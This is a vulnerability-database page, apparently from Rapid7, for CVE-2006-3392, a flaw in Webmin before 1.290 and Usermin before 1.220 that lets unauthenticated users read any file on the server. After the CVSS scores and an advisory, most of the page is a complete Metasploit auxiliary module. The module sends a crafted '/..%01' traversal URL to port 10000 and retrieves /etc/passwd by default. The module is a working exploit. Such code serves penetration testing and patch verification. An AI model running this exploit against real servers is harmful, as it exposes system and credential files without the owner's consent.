Webmin File Disclosure

2008-01-0622:02:01

Matteo Cantoni <[email protected]>

www.rapid7.com

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

JSON

A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin File Disclosure',
      'Description'    => %q{
        A vulnerability has been reported in Webmin and Usermin, which can be
        exploited by malicious people to disclose potentially sensitive information.
        The vulnerability is caused due to an unspecified error within the handling
        of an URL. This can be exploited to read the contents of any files on the
        server via a specially crafted URL, without requiring a valid login.
        The vulnerability has been reported in Webmin (versions prior to 1.290) and
        Usermin (versions prior to 1.220).
      },
      'Author'         => [ 'Matteo Cantoni <goony[at]nothink.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '26772'],
          ['BID', '18744'],
          ['CVE', '2006-3392'],
          ['US-CERT-VU', '999601'],
          ['URL', 'https://web.archive.org/web/20060722192501/http://secunia.com/advisories/20892/'],
        ],
      'DisclosureDate' => '2006-06-30',
      'Actions'        =>
        [
          ['Download', 'Description' => 'Download arbitrary file']
        ],
      'DefaultAction'  => 'Download'
      ))

    register_options(
      [
        Opt::RPORT(10000),
        OptString.new('RPATH',
          [
            true,
            "The file to download",
            "/etc/passwd"
          ]
        ),
        OptString.new('DIR',
          [
            true,
            "Webmin directory path",
            "/unauthenticated"
          ]
        ),
      ])
  end

  def run
    print_status("Attempting to retrieve #{datastore['RPATH']}...")

    dir = normalize_uri(datastore['DIR'])
    uri = Rex::Text.uri_encode(dir) + "/..%01" * 40 + Rex::Text.uri_encode(datastore['RPATH'])

    res = send_request_raw({
      'uri'            => uri,
    }, 10)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print(res.body)
    else
      print_status("No response from the server")
    end
  end
end